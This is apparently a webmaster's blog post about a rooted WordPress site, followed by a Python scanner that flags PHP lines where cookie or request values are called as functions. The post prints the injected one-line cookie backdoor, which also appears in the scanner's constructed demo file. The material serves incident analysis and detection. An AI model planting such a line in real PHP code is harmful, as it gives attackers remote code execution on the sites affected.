New WP Hack

So this new one hit me pretty hard today. Normal WordPress hack I go through the plugins, see what’s infected, and work my way out. This time? Nope. Heck, even Google’s Safe Browsing Site Status came back as “Not Dangerous”. Online scanners came back clean, and I was beginning to question what was what when, lo and behold, in the Google SERP: “This site may be hacked.”

Something was amiss. The plugin CodeGuard was installed and activated. From their service: “When a change is detected, we will alert you and take a new backup of your database and site content.” There are a lot of backups in the site, and I wondered if the site owner was ever notified, or even cared. Upon closer inspection the API for the service was not set. 

All files were touched by the hack, with the line:

if (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);

added to each core file. index.php, .htaccess and a file in root called post.php were altered/added respectively. Because of their size I put them up on GitHub at: https://github.com/michalsen/hacked_files

Yep, this server was rooted.
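The injected line calls whatever function is named in the user cookie, with the id cookie as its argument. The script below is an added example, not code from the original post: it walks a site tree and flags any PHP line where a request superglobal element is invoked as a function. It generalises from $_COOKIE to $_GET, $_POST and $_REQUEST, and the file names and sample tree in demo() are constructed.

```python
import re
import tempfile
from pathlib import Path

# A request superglobal element followed directly by "(" is being used as the
# function name of a call, e.g. @$_COOKIE["user"]($_COOKIE["id"]);
# Reading a value, as in isset($_COOKIE["id"]), is followed by ")" and is not matched.
CALLABLE_SUPERGLOBAL = re.compile(
    r"\$_(?:COOKIE|GET|POST|REQUEST)\s*\[[^\]]+\]\s*\("
)
PHP_SUFFIXES = {".php", ".phtml", ".inc"}  # assumption: extensions worth scanning


def scan_text(text):
    """Return (line_number, line) pairs where a superglobal is called as a function."""
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if CALLABLE_SUPERGLOBAL.search(line)]


def scan_tree(root):
    """Map each PHP file under root (relative path) to its suspicious lines."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in PHP_SUFFIXES:
            found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                hits[path.relative_to(root).as_posix()] = found
    return hits


def demo():
    """Build a small constructed tree (not the real site) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-includes").mkdir()
        (root / "index.php").write_text(
            '<?php\nif (isset($_COOKIE["id"])) @$_COOKIE["user"]($_COOKIE["id"]);\n'
            "require __DIR__ . '/wp-blog-header.php';\n", encoding="utf-8")
        (root / "wp-includes" / "clean.php").write_text(
            "<?php\nif (isset($_COOKIE['lang'])) { $lang = $_COOKIE['lang']; }\n",
            encoding="utf-8")
        return scan_tree(root)


if __name__ == "__main__":
    for name, lines in demo().items():
        for number, line in lines:
            print(f"{name}:{number}: {line}")
```

A hit list like this only shows which files carry the marker; files that were added or altered in other ways still need a comparison against a clean copy of the same WordPress version.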
